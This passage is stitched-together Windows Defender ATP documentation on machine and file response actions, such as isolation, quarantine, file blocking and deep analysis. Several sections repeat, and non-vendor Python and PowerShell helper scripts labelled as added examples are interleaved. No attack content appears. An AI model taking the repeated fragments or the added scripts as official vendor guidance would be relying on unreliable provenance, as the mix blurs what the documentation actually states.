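        zf.writestr("Prefetch files/PrefetchFilesList.txt", "CMD.EXE-0BD30981.pf\n")
        zf.writestr("Services/services.txt", "Spooler  Running\n")
        zf.writestr("SMB sessions/SMBInboundSessions.txt", NO_REGISTRY_KEY + "\n")
        zf.writestr("SMB sessions/SMBOutboundSession.txt", "\\\\fileserver\\share\n")
        zf.writestr("Temp Directories/svc_backup.txt", NO_TEMP_DIR + "\n")
        zf.writestr("Temp Directories/alice.txt", "~tmp4F2A.tmp\nupdate.exe\n")
        zf.writestr("Autoruns/Run.txt", NO_REGISTRY_KEY + "\n")
        zf.writestr("CollectionSummaryReport.xls", b"\xd0\xcf\x11\xe0 placeholder")
        # Ipconfig.txt is deliberately left out to exercise the 'missing' state.
    return buf.getvalue()


if __name__ == "__main__":
    report = triage_package(build_sample_package())
    for entry, state in sorted(report.items()):
        print(f"{state:8s} {entry}")
    print(summarize(report))
```

An 'empty' artifact is a normal outcome the documentation describes (for example, no inbound SMB sessions), whereas 'error' and 'missing' entries are the ones to reconcile against CollectionSummaryReport.xls before drawing conclusions from the package.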

Run Windows Defender Antivirus scan on machines


As part of the investigation or response process, you can remotely initiate an antivirus scan to help identify and
remediate malware that might be present on a compromised machine.

IMPORTANT
This action is available for machines on Windows 10, version 1709 or later.
A Windows Defender Antivirus (Windows Defender AV) scan can run alongside other antivirus solutions, whether Windows
Defender AV is the active antivirus solution or not. Windows Defender AV can be in Passive mode. For more information,
see Windows Defender Antivirus compatibility.

1. Select the machine that you want to run the scan on. You can select or search for a machine from any of the
following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Run antivirus scan.

3. Select the scan type that you'd like to run. You can choose between a quick or a full scan.
4. Type a comment and select Yes, run scan to start the scan.
The Action center shows the scan information:
Submission time - Shows when the action was submitted.
Status - Indicates any pending actions or the results of completed actions.
The machine timeline will include a new event, reflecting that a scan action was submitted on the machine.
Windows Defender AV alerts will reflect any detections that surfaced during the scan.

Restrict app execution


In addition to containing an attack by stopping malicious processes, you can also lock down a device
and prevent subsequent attempts by potentially malicious programs to run.

IMPORTANT
This action is available for machines on Windows 10, version 1709 or later.
This feature is available if your organization uses Windows Defender Antivirus.
This action needs to meet the Windows Defender Application Control code integrity policy formats and signing
requirements. For more information, see Code integrity policy formats and signing.

The action to restrict an application from running applies a code integrity policy that only allows running of files
that are signed by a Microsoft issued certificate. This method of restriction can help prevent an attacker from
controlling compromised machines and performing further malicious activities.

NOTE
You’ll be able to reverse the restriction of applications from running at any time.

1. Select the machine on which you'd like to restrict an application from running. You can select or search for
a machine from any of the following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Restrict app execution.

3. Type a comment and select Yes, restrict app execution to take action on the file.
The Action center shows the submission information:
Submission time - Shows when the action was submitted.
Status - Indicates any pending actions or the results of completed actions.
When the application execution restriction configuration is applied, a new event is reflected in the machine timeline.
Notification on machine user:
When an app is restricted, the following notification is displayed to inform the user that an app is being restricted
from running:

Remove app restriction


Depending on the severity of the attack and the state of the machine, you can choose to reverse the restriction of
applications policy after you have verified that the compromised machine has been remediated.
1. Select the machine on which you restricted an application from running.
2. Open the Actions menu and select Remove app restrictions.

3. Type a comment and select Yes, remove restriction to take action on the application. The application
restriction will no longer apply on the machine.

Isolate machines from the network


Depending on the severity of the attack and the sensitivity of the machine, you might want to isolate the machine
from the network. This action can help prevent the attacker from controlling the compromised machine and
performing further activities such as data exfiltration and lateral movement.

IMPORTANT
Full isolation is available for machines on Windows 10, version 1703.
Selective isolation is available for machines on Windows 10, version 1709 or later.

This machine isolation feature disconnects the compromised machine from the network while retaining
connectivity to the Windows Defender ATP service, which continues to monitor the machine.
On Windows 10, version 1709 or later, you'll have additional control over the network isolation level. You can also
choose to enable Outlook and Skype for Business connectivity (a.k.a 'Selective Isolation').
NOTE
You’ll be able to reconnect the machine back to the network at any time.

1. Select the machine that you want to isolate. You can select or search for a machine from any of the following
views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Isolate machine.

3. Select the check-box if you'd like to enable Outlook and Skype communication while the machine is isolated
(a.k.a. 'Selective Isolation').
4. Type a comment and select Yes, isolate machine to take action on the machine.

NOTE
The machine will remain connected to the Windows Defender ATP service even if it is isolated from the network. If
you've chosen to enable Outlook and Skype for Business communication, then you'll be able to communicate to the
user while the machine is isolated.

The Action center shows the submission information:
Submission time - Shows when the action was submitted.
Status - Indicates any pending actions or the results of completed actions. Additional indications will be
provided if you've enabled Outlook and Skype for Business communication.
When the isolation configuration is applied, a new event is reflected in the machine timeline.
Notification on machine user:
When a machine is being isolated, the following notification is displayed to inform the user that the machine is
being isolated from the network:

Release machine from isolation


Depending on the severity of the attack and the state of the machine you can choose to release the machine from
isolation after you have verified that the compromised machine has been remediated.
1. Select a machine that was previously isolated.
2. Open the Actions menu and select Release from isolation.

3. Type a comment and select Yes, release machine to take action on the machine. The machine will be
reconnected to the network.

Check activity details in Action center


The Action center provides information on actions that were taken on a machine or file. You’ll be able to view the
following details:
Investigation package collection
Antivirus scan
App restriction
Machine isolation
All other related details are also shown, for example, submission time, submitting user, and if the action succeeded
or failed.
Related topic
Take response actions on a file
Take response actions on a machine
4/22/2019 • 11 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )

Want to experience Windows Defender ATP? Sign up for a free trial.

Quickly respond to detected attacks by isolating machines or collecting an investigation package. After taking
action on machines, you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.
For non-Windows platforms, response capabilities (such as Machine isolation) are dependent on the third-party
capabilities.

Collect investigation package from machines


As part of the investigation or response process, you can collect an investigation package from a machine. By
collecting the investigation package, you can identify the current state of the machine and further understand
the tools and techniques used by the attacker.

IMPORTANT
This response action is available for machines on Windows 10, version 1703 or later.

You can download the package (Zip file) and investigate the events that occurred on a machine.
The package contains the following folders:

FOLDER DESCRIPTION

Autoruns Contains a set of files that each represent the content of the
registry of a known auto start entry point (ASEP) to help
identify attacker’s persistency on the machine.
NOTE: If the registry key is not found, the file will contain
the following message: “ERROR: The system was unable to
find the specified registry key or value.”

Installed programs This .CSV file contains the list of installed programs that can
help identify what is currently installed on the machine. For
more information, see Win32_Product class.
FOLDER DESCRIPTION

Network connections This folder contains a set of data points related to the
connectivity information which can help in identifying
connectivity to suspicious URLs, attacker’s command and
control (C&C) infrastructure, any lateral movement, or
remote connections.
- ActiveNetworkConnections.txt – Displays protocol
statistics and current TCP/IP network connections. Provides
the ability to look for suspicious connectivity made by a
process.

- Arp.txt – Displays the current address resolution protocol


(ARP) cache tables for all interfaces.

ARP cache can reveal additional hosts on a network that


have been compromised or suspicious systems on the
network that night have been used to run an internal
attack.

- Dnscache.txt - Displays the contents of the DNS client


resolver cache, which includes both entries preloaded from
the local Hosts file and any recently obtained resource
records for name queries resolved by the computer. This can
help in identifying suspicious connections.

- Ipconfig.txt – Displays the full TCP/IP configuration for all


adapters. Adapters can represent physical interfaces, such as
installed network adapters, or logical interfaces, such as dial-
up connections.

Prefetch files Windows Prefetch files are designed to speed up the


application startup process. It can be used to track all the
files recently used in the system and find traces for
applications that might have been deleted but can still be
found in the prefetch file list.
- Prefetch folder – Contains a copy of the prefetch files from
%SystemRoot%\Prefetch . NOTE: It is suggested to
download a prefetch file viewer to view the prefetch files.

- PrefetchFilesList.txt – Contains the list of all the copied files


which can be used to track if there were any copy failures to
the prefetch folder.

Processes Contains a .CSV file listing the running processes which


provides the ability to identify current processes running on
the machine. This can be useful when identifying a
suspicious process and its state.

Scheduled tasks Contains a .CSV file listing the scheduled tasks which can be
used to identify routines performed automatically on a
chosen machine to look for suspicious code which was set
to run automatically.

Security event log Contains the security event log which contains records of
login or logout activity, or other security-related events
specified by the system's audit policy.
NOTE: Open the event log file using Event viewer.

Services Contains the services.txt file which lists services and their
states.
FOLDER DESCRIPTION

Windows Server Message Block (SMB) sessions Lists shared access to files, printers, and serial ports and
miscellaneous communications between nodes on a
network. This can help identify data exfiltration or lateral
movement.
Contains files for SMBInboundSessions and
SMBOutboundSession.

NOTE: If the file contains the following message: “ERROR:


The system was unable to find the specified registry key or
value.”, it means that there were no SMB sessions of this
type (inbound or outbound).

Temp Directories Contains a set of text files that lists the files located in
%Temp% for every user in the system.
This can help to track suspicious files that an attacker may
have dropped on the system.

NOTE: If the file contains the following message: “The


system cannot find the path specified”, it means that there
is no temp directory for this user, and might be because the
user didn’t log in to the system.

Users and Groups Provides a list of files that each represent a group and its
members.

CollectionSummaryReport.xls This file is a summary of the investigation package


collection, it contains the list of data points, the command
used to extract the data, the execution status, and the error
code in case of failure. You can use this report to track if the
package includes all the expected data and identify if there
were any errors.

1. Select the machine that you want to investigate. You can select or search for a machine from any of the
   following views:
   Security operations dashboard - Select the machine name from the Top machines with active alerts section.
   Alerts queue - Select the machine name beside the machine icon from the alerts queue.
   Machines list - Select the heading of the machine name from the machines list.
   Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Collect investigation package.
3. Type a comment and select Yes, collect package to take action on the machine.
   The Action center shows the submission information:
   Submission time - Shows when the action was submitted.
   Status - Indicates if the package was successfully collected from the network. When the collection is
   complete, you can download the package.
4. Select Package available to download the package.
   When the package is available, a new event will be added to the machine timeline.
   You can download the package from the machine page or the Action center.

You can also search for historical packages in the machine timeline.
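The table above tells you which collector messages mean "nothing was found" rather than "collection failed". The following PowerShell is an added example and not code from the Windows Defender ATP documentation: once you have downloaded and extracted a package, it walks the package folder and classifies every text file as "no data" (its content is one of the two collector messages quoted above), "empty" (no non-blank lines) or "has data", so an analyst can go straight to the data points that actually contain something. It assumes the data points are plain .txt files grouped in sub-folders and that $PackageRoot is the folder you extracted into; both the function name and the sample path are this example's own.

```powershell
# Added example; not part of the Windows Defender ATP documentation.
# Triage an extracted investigation package: flag files that only carry a
# collector "no data" message so they are not mistaken for collection failures.
# Assumptions: data points are .txt files in sub-folders; $PackageRoot is the
# folder the downloaded package was extracted into.

# Messages the collector writes when a data point had nothing to report (quoted from the table above).
$NoDataMarkers = @(
    'The system was unable to find the specified registry key or value'   # SMB sessions
    'The system cannot find the path specified'                           # Temp directories
)

function Get-PackageTriage {
    param([Parameter(Mandatory)][string]$PackageRoot)

    if (-not (Test-Path -LiteralPath $PackageRoot -PathType Container)) {
        throw "Package folder not found: $PackageRoot"
    }

    Get-ChildItem -LiteralPath $PackageRoot -Recurse -File -Filter '*.txt' | ForEach-Object {
        $file = $_
        $text = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction SilentlyContinue

        # Count non-blank lines so a one-line marker file and a real listing are told apart.
        $lineCount = 0
        if ($text) {
            $lineCount = @($text -split "`r?`n" | Where-Object { $_.Trim() }).Count
        }

        # First marker found in the file, if any.
        $marker = $null
        if ($text) {
            $marker = $NoDataMarkers | Where-Object { $text.Contains($_) } | Select-Object -First 1
        }

        [pscustomobject]@{
            DataPoint = $file.Directory.Name   # sub-folder the file sits in
            File      = $file.Name
            Lines     = $lineCount
            State     = if ($marker) { 'no data' } elseif ($lineCount -eq 0) { 'empty' } else { 'has data' }
            Marker    = $marker
        }
    }
}

# Usage (assumed path): summarize the package, then list the data points worth reading first.
$triage = Get-PackageTriage -PackageRoot 'C:\Cases\case-0001\package'
$triage | Group-Object State | Select-Object Name, Count | Format-Table -AutoSize
$triage | Where-Object { $_.State -eq 'has data' } | Sort-Object DataPoint, File | Format-Table -AutoSize
```

A file that reports "empty" without a marker is the case worth a second look: it is neither a known "nothing found" result nor a listing, so compare it against the execution status and error code recorded for that data point in CollectionSummaryReport.xls.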

Run Windows Defender Antivirus scan on machines


As part of the investigation or response process, you can remotely initiate an antivirus scan to help identify
and remediate malware that might be present on a compromised machine.
IMPORTANT
This action is available for machines on Windows 10, version 1709 or later.
A Windows Defender Antivirus (Windows Defender AV) scan can run alongside other antivirus solutions, whether
Windows Defender AV is the active antivirus solution or not. Windows Defender AV can be in Passive mode. For
more information, see Windows Defender Antivirus compatibility.

1. Select the machine that you want to run the scan on. You can select or search for a machine from any of
   the following views:
   Security operations dashboard - Select the machine name from the Top machines with active alerts section.
   Alerts queue - Select the machine name beside the machine icon from the alerts queue.
   Machines list - Select the machine name from the list of machines.
   Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Run antivirus scan.
3. Select the scan type that you'd like to run. You can choose between a quick or a full scan.
4. Type a comment and select Yes, run scan to start the scan.
   The Action center shows the scan information:
   Submission time - Shows when the action was submitted.
   Status - Indicates any pending actions or the results of completed actions.
The machine timeline will include a new event, reflecting that a scan action was submitted on the machine.
Windows Defender AV alerts will reflect any detections that surfaced during the scan.

Restrict app execution


In addition to the ability of containing an attack by stopping malicious processes, you can also lock down a
device and prevent subsequent attempts of potentially malicious programs from running.

IMPORTANT
This action is available for machines on Windows 10, version 1709 or later.
This feature is available if your organization uses Windows Defender Antivirus.
This action needs to meet the Windows Defender Application Control code integrity policy formats and signing
requirements. For more information, see Code integrity policy formats and signing.

The action to restrict an application from running applies a code integrity policy that only allows running of
files that are signed by a Microsoft issued certificate. This method of restriction can help prevent an attacker
from controlling compromised machines and performing further malicious activities.

NOTE
You’ll be able to reverse the restriction of applications from running at any time.
1. Select the machine on which you'd like to restrict an application from running. You can select or
   search for a machine from any of the following views:
   Security operations dashboard - Select the machine name from the Top machines with active alerts section.
   Alerts queue - Select the machine name beside the machine icon from the alerts queue.
   Machines list - Select the machine name from the list of machines.
   Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Restrict app execution.
3. Type a comment and select Yes, restrict app execution to take action on the file.
   The Action center shows the submission information:
   Submission time - Shows when the action was submitted.
   Status - Indicates any pending actions or the results of completed actions.
When the application execution restriction configuration is applied, a new event is reflected in the machine
timeline.
Notification on machine user:
When an app is restricted, the following notification is displayed to inform the user that an app is being
restricted from running:

Remove app restriction


Depending on the severity of the attack and the state of the machine, you can choose to reverse the restriction
of applications policy after you have verified that the compromised machine has been remediated.
1. Select the machine on which you restricted an application from running.
2. Open the Actions menu and select Remove app restrictions.
3. Type a comment and select Yes, remove restriction to take action on the application. The
   application restriction will no longer apply on the machine.

Isolate machines from the network


Depending on the severity of the attack and the sensitivity of the machine, you might want to isolate the
machine from the network. This action can help prevent the attacker from controlling the compromised
machine and performing further activities such as data exfiltration and lateral movement.

IMPORTANT
Full isolation is available for machines on Windows 10, version 1703.
Selective isolation is available for machines on Windows 10, version 1709 or later.

This machine isolation feature disconnects the compromised machine from the network while retaining
connectivity to the Windows Defender ATP service, which continues to monitor the machine.
On Windows 10, version 1709 or later, you'll have additional control over the network isolation level. You can
also choose to enable Outlook and Skype for Business connectivity (a.k.a 'Selective Isolation').

NOTE
You’ll be able to reconnect the machine back to the network at any time.

1. Select the machine that you want to isolate. You can select or search for a machine from any of the
   following views:
   Security operations dashboard - Select the machine name from the Top machines with active alerts section.
   Alerts queue - Select the machine name beside the machine icon from the alerts queue.
   Machines list - Select the machine name from the list of machines.
   Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Isolate machine.
3. Select the check-box if you'd like to enable Outlook and Skype communication while the machine is
   isolated (a.k.a. 'Selective Isolation').
4. Type a comment and select Yes, isolate machine to take action on the machine.

NOTE
The machine will remain connected to the Windows Defender ATP service even if it is isolated from the network.
If you've chosen to enable Outlook and Skype for Business communication, then you'll be able to communicate
with the user while the machine is isolated.

The Action center shows the submission information:
Submission time - Shows when the action was submitted.
Status - Indicates any pending actions or the results of completed actions. Additional indications will
be provided if you've enabled Outlook and Skype for Business communication.
When the isolation configuration is applied, a new event is reflected in the machine timeline.
Notification on machine user:
When a machine is being isolated, the following notification is displayed to inform the user that the machine is
being isolated from the network:

Release machine from isolation


Depending on the severity of the attack and the state of the machine, you can choose to release the machine
from isolation after you have verified that the compromised machine has been remediated.
1. Select a machine that was previously isolated.
2. Open the Actions menu and select Release from isolation.

3. Type a comment and select Yes, release machine to take action on the machine. The machine will be
reconnected to the network.

Check activity details in Action center


The Action center provides information on actions that were taken on a machine or file. You’ll be able to view
the following details:
Investigation package collection
Antivirus scan
App restriction
Machine isolation
All other related details are also shown, for example, submission time, submitting user, and if the action
succeeded or failed.
Related topic
Take response actions on a file

Take response actions on a file
4/19/2019 • 10 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a file. After taking action on files,
you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.

You can also submit files for deep analysis to run the file in a secure cloud sandbox. When the analysis is complete,
you'll get a detailed report that provides information about the behavior of the file.

Stop and quarantine files in your network


You can contain an attack in your organization by stopping the malicious process and quarantining the file
where it was observed.

IMPORTANT
You can only take this action if:
The machine you're taking the action on is running Windows 10, version 1703 or later
The file does not belong to a trusted third-party publisher and is not signed by Microsoft
Windows Defender Antivirus must at least be running in Passive mode. For more information, see Windows Defender
Antivirus compatibility.

The Stop and Quarantine File action includes stopping running processes, quarantining the files, and deleting
persistence such as registry keys.
The action takes effect on machines with Windows 10, version 1703 or later, where the file was observed in the last
30 days.

NOTE
You’ll be able to restore the file from quarantine at any time.

Stop and quarantine files


1. Select the file you want to stop and quarantine. You can select a file from any of the following views or use
   the Search box:
   Alerts - click the corresponding links from the Description or Details in the Artifact timeline
   Search box - select File from the drop-down menu and enter the file name
2. Open the Actions menu and select Stop and Quarantine File.
3. Specify a reason, then click Yes, stop and quarantine.
   The Action center shows the submission information:
   Submission time - Shows when the action was submitted.
   Success - Shows the number of machines where the file has been stopped and quarantined.
   Failed - Shows the number of machines where the action failed and details about the failure.
   Pending - Shows the number of machines where the file is yet to be stopped and quarantined. This
   can take time for cases when the machine is offline or not connected to the network.
4. Select any of the status indicators to view more information about the action. For example, select Failed to
   see where the action failed.
Notification on machine user:
When the file is being removed from a machine, the following notification is shown:

In the machine timeline, a new event is added for each machine where a file was stopped and quarantined.

IMPORTANT
The Action button is turned off for files signed by Microsoft as well as trusted third-party publishers to prevent the removal
of critical system files and files used by important applications.
For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from quarantine


You can roll back and remove a file from quarantine if you’ve determined that it’s clean after an investigation. Run
the following command on each machine where the file was quarantined.
1. Open an elevated command-line prompt on the machine:
   a. Go to Start and type cmd.
   b. Right-click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

   "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Restore -Name EUS:Win32/CustomEnterpriseBlock -All

NOTE
Windows Defender ATP will restore all files that were quarantined on this machine in the last 30 days.
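Because the restore command brings back everything quarantined under that threat name, it helps to know what is in quarantine before running it. The following PowerShell function is an added example, not code from the Windows Defender ATP documentation: it lists the quarantine inventory with MpCmdRun's -Restore -ListAll switch, writes that inventory to a log, then runs the restore command given above and records its exit code. MpCmdRun.exe and its -Restore switches are the tool's own; the function name, the log path and the logging format are this example's choices. Run it from an elevated PowerShell session on the machine where the file was quarantined.

```powershell
# Added example; not part of the Windows Defender ATP documentation.
# List quarantine contents, log them, then run the page's restore command and
# report its exit code so the analyst has a record of what was restored.

$MpCmdRun = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'

function Restore-QuarantinedEnterpriseBlock {
    param(
        # Threat name used by the restore command above (page default).
        [string]$ThreatName = 'EUS:Win32/CustomEnterpriseBlock',
        # Assumed log location; change to your case folder.
        [string]$LogPath = 'C:\Cases\restore-quarantine.log'
    )

    if (-not (Test-Path -LiteralPath $MpCmdRun)) {
        throw "MpCmdRun.exe not found at $MpCmdRun"
    }

    # 1. Record the current quarantine inventory before changing anything.
    $stamp = Get-Date -Format o
    $inventory = & $MpCmdRun -Restore -ListAll 2>&1
    ("[{0}] Quarantine inventory on {1}:" -f $stamp, $env:COMPUTERNAME) | Out-File -FilePath $LogPath -Append
    $inventory | Out-File -FilePath $LogPath -Append
    $inventory | Write-Host

    # 2. Restore every item quarantined under the enterprise-block threat name.
    & $MpCmdRun -Restore -Name $ThreatName -All 2>&1 | Out-File -FilePath $LogPath -Append
    $exitCode = $LASTEXITCODE
    ("[{0}] Restore of '{1}' finished with exit code {2}" -f (Get-Date -Format o), $ThreatName, $exitCode) |
        Out-File -FilePath $LogPath -Append

    if ($exitCode -ne 0) {
        Write-Warning "MpCmdRun returned $exitCode; review $LogPath and the inventory printed above."
    }
    return $exitCode
}

# Usage: run once per machine where the file was quarantined; 0 means MpCmdRun reported success.
Restore-QuarantinedEnterpriseBlock
```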

Block files in your network


You can prevent further propagation of an attack in your organization by banning potentially malicious files or
suspected malware. If you know a potentially malicious portable executable (PE) file, you can block it. This
operation will prevent it from being read, written, or executed on machines in your organization.

IMPORTANT
This feature is available if your organization uses Windows Defender Antivirus and Cloud-based protection is enabled. For
more information, see Manage cloud-based protection.
The Antimalware client version must be 4.18.1901.x or later.
This feature is designed to prevent suspected malware (or potentially malicious files) from being downloaded from the
web. It currently supports portable executable (PE) files, including .exe and .dll files. The coverage will be extended over
time.
This response action is available for machines on Windows 10, version 1703 or later.
The allow or block action cannot be applied to a file whose classification was already in the device's cache before the
action was taken.
NOTE
The PE file needs to be in the machine timeline for you to be able to take this action.
There may be a couple of minutes of latency between the time the action is taken and the actual file being blocked.

Enable the block file feature


Before you can block files, you'll need to enable the feature.
1. In the navigation pane, select Settings > Advanced features > Block file.
2. Toggle the setting between On and Off and select Save preferences.

Block a file
1. Select the file you want to block. You can select a file from any of the following views or use the Search box:
   Alerts - click the corresponding links from the Description or Details in the Artifact timeline
   Search box - select File from the drop-down menu and enter the file name
2. Open the Actions menu and select Block.
3. Specify a reason and select Yes, block file to take action on the file.
   The Action center shows the submission information:
   Submission time - Shows when the action was submitted.
   Submitting user - Shows who submitted the action on the file. You can view the comments provided by
   the user by selecting the information icon.
   Status - Indicates whether the file was added to or removed from the blocked list.
When the file is blocked, there will be a new event in the machine timeline.

NOTE
If a file was scanned before the action was taken, it may take longer for the block to become effective on the device.

Notification on machine user:


When a file is being blocked on the machine, the following notification is displayed to inform the user that the file
was blocked:

NOTE
The Action button is turned off for files signed by Microsoft to prevent negative impact on machines in your organization
caused by the removal of files that might be related to the operating system.

For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from blocked list


1. Select the file you want to remove from the blocked list. You can select a file from any of the following views
   or use the Search box:
   Alerts - Click the file links from the Description or Details in the Artifact timeline
   Search box - Select File from the drop-down menu and enter the file name
2. Open the Actions menu and select Remove file from blocked list.
3. Type a comment and select Yes to take action on the file. The file will be allowed to run in the organization.

Check activity details in Action center
The Action center provides information on actions that were taken on a machine or file. You’ll be able to view the
details on the last action that was taken on a file, such as stopped and quarantined files or blocked files.

Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one or more observed files that
are often new or unknown. Clicking a file takes you to the file view where you can see the file's metadata. To enrich
the data related to the file, you can submit the file for deep analysis.
The deep analysis feature executes a file in a secure, fully instrumented cloud environment. Deep analysis results
show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry modifications,
and communication with IPs. Deep analysis currently supports extensive analysis of portable executable (PE) files
(including .exe and .dll files).
Deep analysis of a file takes several minutes. When the file analysis is complete, results are made available in the
File view page, under a new Deep analysis summary section. The summary includes a list of observed behaviors,
some of which can indicate malicious activity, and observables, including contacted IPs and files created on the disk.
Results of deep analysis are matched against threat intelligence and any matches will generate appropriate alerts.
Submit files for analysis
Use the deep analysis feature to investigate the details of any file, usually during an investigation of an alert or for
any other reason where you suspect malicious behavior. This feature is available in the context of the file view.
In the file's page, Submit for deep analysis is enabled when the file is available in the Windows Defender ATP
backend sample collection or if it was observed on a Windows 10 machine that supports submitting to deep
analysis.

NOTE
Only files from Windows 10 can be automatically collected.

You can also manually submit a sample through the Malware Protection Center Portal if the file was not observed
on a Windows 10 machine, and wait for the Submit for deep analysis button to become available.

NOTE
Due to backend processing flows in the Malware Protection Center Portal, there could be up to 10 minutes of latency
between file submission and availability of the deep analysis feature in Windows Defender ATP.

When the sample is collected, Windows Defender ATP runs the file in a secure environment and creates a
detailed report of observed behaviors and associated artifacts, such as files dropped on machines, communication
to IPs, and registry modifications.
Submit files for deep analysis:
1. Select the file that you want to submit for deep analysis. You can select or search a file from any of the following
   views:
   Alerts - click the file links from the Description or Details in the Artifact timeline
   Machines list - click the file links from the Description or Details in the Machine in organization section
   Search box - select File from the drop-down menu and enter the file name
2. In the Deep analysis section of the file view, click Submit.

NOTE
Only PE files are supported, including .exe and .dll files.

A progress bar is displayed and provides information on the different stages of the analysis. You can then view the
report when the analysis is done.

NOTE
Depending on machine availability, sample collection time can vary. There is a 3-hour timeout for sample collection. The
collection will fail and the operation will abort if there is no online Windows 10 machine reporting at that time. You can
re-submit files for deep analysis to get fresh data on the file.

View deep analysis reports


View the deep analysis report that Windows Defender ATP provides to see the details of the deep analysis that was
conducted on the file you submitted. This feature is available in the file view context.
You can view the comprehensive report that provides details on the following sections:
Behaviors
Observables
The details provided can help you investigate if there are indications of a potential attack.
1. Select the file you submitted for deep analysis.
2. Click See the report below. Information on the analysis is displayed.

Troubleshoot deep analysis


If you encounter a problem when trying to submit a file, try each of the following troubleshooting steps.
1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll extensions (executable programs or
   applications).
2. Ensure the service has access to the file, that it still exists, and that it has not been corrupted or modified.
3. You can wait a short while and try to submit the file again, in case the queue is full or there was a temporary
   connection or communication error.
4. If the sample collection policy is not configured, the default behavior is to allow sample collection. If it is
   configured, verify that the policy setting allows sample collection before submitting the file again. When
   sample collection is configured, check the following registry value:
   Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
   Name: AllowSampleCollection
   Type: DWORD
   Hexadecimal value:
   Value = 0 – block sample collection
   Value = 1 – allow sample collection
5. Change the organizational unit through the Group Policy. For more information, see Configure with Group
   Policy.
6. If these steps do not resolve the issue, contact winatp@microsoft.com.
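The registry value in step 4 and the prerequisites stated earlier for the block-file action (Windows Defender Antivirus with cloud-based protection enabled, antimalware client 4.18.1901.x or later) are all local to the machine, so they can be verified in one pass before an analyst submits a file or blocks one. The following PowerShell is an added example, not code from the Windows Defender ATP documentation: it reads the Defender state with the Get-MpComputerStatus and Get-MpPreference cmdlets and reads the AllowSampleCollection value under the policy path given in step 4, treating an absent value as the default (allow) exactly as step 4 describes. The cmdlets, their properties and the registry path are real; the function name and the shape of the result object are this example's own.

```powershell
# Added example; not part of the Windows Defender ATP documentation.
# One-pass check of the local prerequisites this page states for two response
# actions: block file (AV present, cloud protection on, client >= 4.18.1901.x)
# and deep-analysis sample collection (AllowSampleCollection policy; absent = allow).

$PolicyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'

function Test-ResponseActionPrerequisites {
    $status = Get-MpComputerStatus   # engine/platform state, including AMProductVersion
    $prefs  = Get-MpPreference       # MAPSReporting holds the cloud-based protection setting

    # Block file: antimalware client must be 4.18.1901.x or later.
    $minVersion = [version]'4.18.1901.0'
    $amVersion  = [version]$status.AMProductVersion
    $versionOk  = $amVersion -ge $minVersion

    # Cloud-based protection (MAPS): 0 = disabled, 1 = basic, 2 = advanced.
    $cloudOk = [int]$prefs.MAPSReporting -ne 0

    # Sample collection policy: a missing value means the default (allow) applies.
    $sample = Get-ItemProperty -Path $PolicyPath -Name AllowSampleCollection -ErrorAction SilentlyContinue
    $sampleState   = 'not configured (default: allow)'
    $sampleAllowed = $true
    if ($null -ne $sample) {
        $value = [int]$sample.AllowSampleCollection
        $sampleAllowed = ($value -eq 1)
        $sampleState = switch ($value) {
            1       { 'allowed (1)' }
            0       { 'blocked (0)' }
            default { "unexpected value $_" }
        }
    }

    [pscustomobject]@{
        Computer                = $env:COMPUTERNAME
        AntivirusEnabled        = [bool]$status.AntivirusEnabled
        AMProductVersion        = $amVersion
        VersionOkForBlockFile   = $versionOk
        CloudProtectionEnabled  = $cloudOk
        BlockFileReady          = ([bool]$status.AntivirusEnabled -and $versionOk -and $cloudOk)
        SampleCollectionPolicy  = $sampleState
        SampleCollectionAllowed = $sampleAllowed
    }
}

# Usage: run on the machine in question; BlockFileReady and SampleCollectionAllowed summarize the result.
Test-ResponseActionPrerequisites | Format-List
```

If SampleCollectionAllowed is false, the value was set to 0 by policy, which is the case step 5 addresses: the machine's organizational unit, and therefore the Group Policy it receives, needs to change before a resubmission will succeed.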

Related topic
Take response actions on a machine
Take response actions on a file
4/19/2019 • 10 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )

Want to experience Windows Defender ATP? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a file. After taking action on files,
you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.

You can also submit files for deep analysis to run the file in a secure cloud sandbox. When the analysis is complete,
you'll get a detailed report that provides information about the behavior of the file.

Stop and quarantine files in your network


You can contain an attack in your organization by stopping the malicious process and quarantine the file where it
was observed.

IMPORTANT
You can only take this action if:
The machine you're taking the action on is running Windows 10, version 1703 or later
The file does not belong to trusted third-party publishers or not signed by Microsoft
Windows Defender Antivirus must at least be running on Passive mode. For more information, see Windows Defender
Antivirus compatibility.

